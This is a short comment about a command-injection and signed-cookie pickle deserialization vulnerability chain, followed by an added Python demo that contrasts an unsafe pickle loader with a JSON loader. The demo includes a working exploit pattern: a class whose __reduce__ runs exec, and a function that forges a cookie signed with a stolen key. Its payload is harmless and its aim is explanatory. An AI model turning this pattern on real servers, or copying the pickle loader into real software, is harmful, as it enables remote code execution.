As far as I can tell there are two vulnerabilities bundled up here. One is an unauthenticated command injection (!) vulnerability to steal some keys and the other is of course yet another serialization-based RCE in a safe language, mediated by signed cookies (signed with the keys stolen in step 1).
I don't understand how often this design has to blow up in people's faces until they stop doing this and use something dumb and safe instead.
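An added illustration of the signed-cookie deserialization pattern the comment is complaining about, alongside the "dumb and safe" alternative. This is example code written for this page, not code from the commenter or from the product being discussed; the cookie format (base64 payload, dot, hex HMAC-SHA256), the key value, the `user_id` field and the `Pwn` payload are all assumptions chosen for the demo. The malicious pickle only sets a flag so the code execution is observable without side effects; a real payload would call `os.system` or similar.

```python
import base64
import builtins
import hashlib
import hmac
import json
import pickle

# Assumed server-side signing key. In the scenario described above it is the
# value an attacker steals in step 1; here it is a constructed constant.
SECRET = b"constructed-demo-secret"


def sign(payload, key):
    """Return base64(payload) + '.' + hex(HMAC-SHA256(key, payload)). Assumed cookie format."""
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + "." + tag


def verify(cookie, key):
    """Return the payload bytes if the tag matches, else None."""
    try:
        b64, tag = cookie.rsplit(".", 1)
        payload = base64.urlsafe_b64decode(b64)
    except ValueError:  # malformed cookie or bad base64
        return None
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return payload


# The dangerous design: the signature proves the cookie came from someone who
# holds the key, and then the payload is handed to a deserializer that executes
# whatever object graph it finds. Anyone who has the key gets code execution.
def load_session_pickle(cookie, key):
    payload = verify(cookie, key)
    if payload is None:
        return None
    return pickle.loads(payload)


# The "dumb and safe" alternative: same signature, but the payload is JSON and
# only the expected fields are read out. A forged payload can at worst be an
# odd JSON document, never code.
def load_session_json(cookie, key):
    payload = verify(cookie, key)
    if payload is None:
        return None
    try:
        data = json.loads(payload)
    except ValueError:  # JSONDecodeError and UnicodeDecodeError both subclass ValueError
        return None
    if not isinstance(data, dict) or "user_id" not in data:
        return None
    return {"user_id": int(data["user_id"])}


def make_json_cookie(session, key):
    """The legitimate server path: sign a JSON session."""
    return sign(json.dumps(session).encode(), key)


class Pwn:
    """Object whose unpickling calls exec(). Assumed demo payload: it only sets
    builtins.PWNED so the execution is observable from a test."""

    def __reduce__(self):
        return (exec, ("import builtins; builtins.PWNED = True",))


def forge_pickle_cookie(stolen_key):
    """Step 2 from the attacker's side: sign a malicious pickle with the stolen key."""
    return sign(pickle.dumps(Pwn()), stolen_key)


if __name__ == "__main__":
    good = make_json_cookie({"user_id": 42}, SECRET)
    print("legit json session:", load_session_json(good, SECRET))

    # Without the key the signature check holds and nothing is deserialized.
    print("forged with wrong key accepted?",
          load_session_pickle(forge_pickle_cookie(b"wrong-key"), SECRET) is not None)

    # With the stolen key, pickle.loads runs the attacker's code.
    forged = forge_pickle_cookie(SECRET)
    load_session_pickle(forged, SECRET)
    print("code ran during pickle.loads:", getattr(builtins, "PWNED", False))

    # The same forged cookie against the JSON loader is just rejected.
    print("same cookie against json loader:", load_session_json(forged, SECRET))
```

The point of keeping `sign`/`verify` identical in both loaders is that the signature is not the problem; it correctly stops anyone without the key. What decides whether a stolen key means "attacker can set their user_id" or "attacker runs code on the server" is purely the choice of serializer behind it.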